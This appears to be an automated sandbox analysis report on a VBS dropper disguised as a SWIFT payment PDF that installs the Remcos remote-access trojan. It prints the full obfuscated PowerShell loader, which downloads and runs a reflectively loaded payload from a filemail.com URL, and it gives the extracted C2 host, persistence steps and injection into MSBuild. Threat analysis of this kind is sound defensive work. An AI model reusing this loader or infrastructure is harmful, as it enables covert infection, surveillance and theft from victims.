Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-11-2024 07:07
Static task
static1
Behavioral task
behavioral1
Sample
SWIFT103202414111523339800111124.pdf.vbs
Resource
win7-20240729-en
General
-
Target
SWIFT103202414111523339800111124.pdf.vbs
-
Size
1KB
-
MD5
1571d85ecdbd26ac45e3f2639e7e4310
-
SHA1
b1dd5db95e88132a5052b451b757b9ce486bccc0
-
SHA256
167887f979c648809aa8328edba96d972b401f74b06ee5026ea073efd4d9b432
-
SHA512
e0d9a19616e3762c67b0f2d24a92529c3bbd26f01938768c0d213470628df97e7f2bf6aa7c0bdf60018590862e500c1ad6bb6e4b0585b4be47d1b06dd9fb4bcf
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Extracted
remcos
NOV
alpha147.ddns.net:35890
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
vlc.exe
-
copy_folder
vlc
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-1KOA72
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
rmc
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 4 IoCs
flow pid Process 2 3512 WScript.exe 8 3512 WScript.exe 26 2456 powershell.exe 28 2456 powershell.exe -
pid Process 208 powershell.exe 3940 powershell.exe 2456 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2456 set thread context of 4480 2456 powershell.exe 102 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2828 PING.EXE 4752 cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2828 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 2 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 8 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 208 powershell.exe 208 powershell.exe 3940 powershell.exe 3940 powershell.exe 2456 powershell.exe 2456 powershell.exe 2456 powershell.exe 2456 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 208 powershell.exe Token: SeDebugPrivilege 3940 powershell.exe Token: SeDebugPrivilege 2456 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4480 MSBuild.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 3512 wrote to memory of 4752 3512 WScript.exe 87 PID 3512 wrote to memory of 4752 3512 WScript.exe 87 PID 4752 wrote to memory of 2828 4752 cmd.exe 89 PID 4752 wrote to memory of 2828 4752 cmd.exe 89 PID 4752 wrote to memory of 208 4752 cmd.exe 97 PID 4752 wrote to memory of 208 4752 cmd.exe 97 PID 3512 wrote to memory of 3940 3512 WScript.exe 98 PID 3512 wrote to memory of 3940 3512 WScript.exe 98 PID 3940 wrote to memory of 2456 3940 powershell.exe 100 PID 3940 wrote to memory of 2456 3940 powershell.exe 100 PID 2456 wrote to memory of 1292 2456 powershell.exe 101 PID 2456 wrote to memory of 1292 2456 powershell.exe 101 PID 2456 wrote to memory of 1292 2456 powershell.exe 101 PID 2456 wrote to memory of 4480 2456 powershell.exe 102 PID 2456 wrote to memory of 4480 2456 powershell.exe 102 PID 2456 wrote to memory of 4480 2456 powershell.exe 102 PID 2456 wrote to memory of 4480 2456 powershell.exe 102 PID 2456 wrote to memory of 4480 2456 powershell.exe 102 PID 2456 wrote to memory of 4480 2456 powershell.exe 102 PID 2456 wrote to memory of 4480 2456 powershell.exe 102 PID 2456 wrote to memory of 4480 2456 powershell.exe 102 PID 2456 wrote to memory of 4480 2456 powershell.exe 102 PID 2456 wrote to memory of 4480 2456 powershell.exe 102 PID 2456 wrote to memory of 4480 2456 powershell.exe 102 PID 2456 wrote to memory of 4480 2456 powershell.exe 102
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT103202414111523339800111124.pdf.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT103202414111523339800111124.pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT103202414111523339800111124.pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzVHJpbkddJFZFcmJvc0VQckVmZVJlbmNFKVsxLDNdKydYJy1qT0luJycpICggKCgnWFpsaW1hZ2VVcmwgPSA0cWpodHRwczovLzEwMTcuZmlsZScrJ21haWwuY29tL2FwaS9maWxlL2dldD9maWxlJysna2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVRLajNMQzZTUXRJY09jX1QzNXcmcGtfdicrJ2lkPWZkNGY2MTRiYjIwOWM2MicrJ2MxNzMnKycwJysnOTQ1MTc2YTA5MDRmIDRxajtYWmx3ZWJDbGllbnQgPSBOZXcnKyctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1habGltYWdlQnl0ZXMgPSBYWmx3ZWJDbGllbnQuRG93bmxvYWREYXRhKFhabGltYWdlVXJsKTtYWmxpbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0JysncmluZyhYWmxpbWFnZUJ5dGVzKTtYWmxzdGFydEZsYWcgPSA0cWo8PEJBU0U2NF9TVEFSVD4+NHFqO1habGVuZEZsYWcgPSA0cWo8PEJBU0U2NF9FTkQ+PjRxajtYWmwnKydzdGFydEluZGUnKyd4ID0gWFpsaW1hZ2VUZXh0LkluZGV4T2YoWFpsc3RhcnRGbGFnKTtYWmxlbmRJbmRleCA9IFhabGltYWdlVGV4dC5JbmRleE9mKFhabGVuZEZsYWcpO1habHN0YXJ0SW5kZXggLWdlIDAgLWFuZCBYWmxlbmRJbmRleCcrJyAtZ3QgWFpsc3RhcnRJbmRleCcrJztYWmxzdGFydEluZGV4ICs9IFhabHN0YXJ0RmxhZy5MZW5ndGg7WFpsYmFzZTY0TGVuZ3RoID0gWFpsZW5kSScrJ25kZXggLSBYWmxzdGFydEluZGV4O1habGJhc2U2NENvbW1hbmQgPSBYWmxpbWFnZVRleHQuU3ViJysnc3RyaW5nKFhabHN0YXJ0SW5kZScrJ3gsIFhabGJhc2U2NExlbmd0aCk7WFpsYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoWFpsYmFzZTY0Q29tbWFuZC5Ub0NoYScrJ3JBcnJheSgpIHAzayBGb3JFYWNoLU9iamVjdCB7IFhabF8gfSlbLTEuLi0oWFpsYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtYWmxjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFhabGJhc2U2NFJldmVyc2VkKTtYWmxsJysnb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoWFpsY29tbWFuZEJ5dGVzKTtYWmx2YWlNZXRob2QgPSAnKydbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRxalZBJysnSTRxaicrJyk7WFpsdmFpTWV0aG9kLkludm9rZShYWmxudWxsLCBAKDRxajAvTFI5Q2cvZC9lZS5lJysndHNhcC8vOnNwdHRoNHFqLCA0cWpkJysnZXNhdGl2YWRvNHFqLCAnKyc0cWpkZXNhdGl2YWRvNHFqLCA0cWpkZXNhdGl2YWRvNHFqLCA0cWpNU0J1aWxkNHFqLCA0cWpkZXNhdGl2YWRvNHFqLCA0cWpkZXNhdGl2YWRvNHFqLDRxamRlc2F0aXZhZG80cWosNHFqZGVzYXRpdmFkbzRxaiw0cWpkZXNhdGl2YWRvNHFqLDRxamRlc2F0aXZhZG80cWosJysnNHFqZGVzYScrJ3RpdmFkbzRxaiw0cWoxNHFqLDRxamRlc2F0aXZhZG80cWopKTsnKSAgLUNSZVBsQUNlKFtjaEFyXTg4K1tjaEFyXTkwK1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFcGxhY2UnNHFqJyxbY2hBcl0zOSAgLVJFcGxhY2UgJ3AzaycsW2NoQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([sTrinG]$VErbosEPrEfeRencE)[1,3]+'X'-jOIn'') ( (('XZlimageUrl = 4qjhttps://1017.file'+'mail.com/api/file/get?file'+'key=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_v'+'id=fd4f614bb209c62'+'c173'+'0'+'945176a0904f 4qj;XZlwebClient = New'+'-Object System.Net.WebClient;XZlimageBytes = XZlwebClient.DownloadData(XZlimageUrl);XZlimageText = [System.T'+'ext.Encoding]::UTF8.GetSt'+'ring(XZlimageBytes);XZlstartFlag = 4qj<<BASE64_START>>4qj;XZlendFlag = 4qj<<BASE64_END>>4qj;XZl'+'startInde'+'x = XZlimageText.IndexOf(XZlstartFlag);XZlendIndex = XZlimageText.IndexOf(XZlendFlag);XZlstartIndex -ge 0 -and XZlendIndex'+' -gt XZlstartIndex'+';XZlstartIndex += XZlstartFlag.Length;XZlbase64Length = XZlendI'+'ndex - XZlstartIndex;XZlbase64Command = XZlimageText.Sub'+'string(XZlstartInde'+'x, XZlbase64Length);XZlbase64Reversed = -join (XZlbase64Command.ToCha'+'rArray() p3k ForEach-Object { XZl_ })[-1..-(XZlbase64Command.Length)];XZlcommandBytes = [System.Convert]::FromBase64String(XZlbase64Reversed);XZll'+'oadedAssembly = [System.Reflection.Assembly]::Load(XZlcommandBytes);XZlvaiMethod = '+'[dnlib.IO.Home].GetMethod(4qjVA'+'I4qj'+');XZlvaiMethod.Invoke(XZlnull, @(4qj0/LR9Cg/d/ee.e'+'tsap//:sptth4qj, 4qjd'+'esativado4qj, '+'4qjdesativado4qj, 4qjdesativado4qj, 4qjMSBuild4qj, 4qjdesativado4qj, 4qjdesativado4qj,4qjdesativado4qj,4qjdesativado4qj,4qjdesativado4qj,4qjdesativado4qj,'+'4qjdesa'+'tivado4qj,4qj14qj,4qjdesativado4qj));') -CRePlACe([chAr]88+[chAr]90+[chAr]108),[chAr]36 -REplace'4qj',[chAr]39 -REplace 'p3k',[chAr]124) )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:1292
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4480
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD58b0c319bf0d03d5d44b2d4d709dafb6b
SHA164e14c86e4b4afca87f5d320437cbf71f1126159
SHA25664390ab8771f187583d935bc616ee2468a664c01b7e023915d8c719b22b84ef0
SHA512ad0a95b0386bdf8f8ce9e4152c0a3cdc3d75ac92702f469f906b3cffb4a47c0c83fa4c6ce3934bea596a3cbe729b03408ef93d7abcf6873354e5e3d112c97606
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
64B
MD54b27de34ffcc41b41d4585bd0a62df7e
SHA1f2b1a3f5bf02c6d439eaa13b8152d8af6056a11f
SHA2567bb4e9d5456bc928981cd9861bd0ad8e46087511dfaebe006773cd492b6a4011
SHA512bfcd6e6116002b37c1c6222b70882b75dd74aa5aef478f11a89456716a1d5cf662c7bc85bb89b10c9480d8e5b220513fa6364d2ec405df6874b23e2e41170f7e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82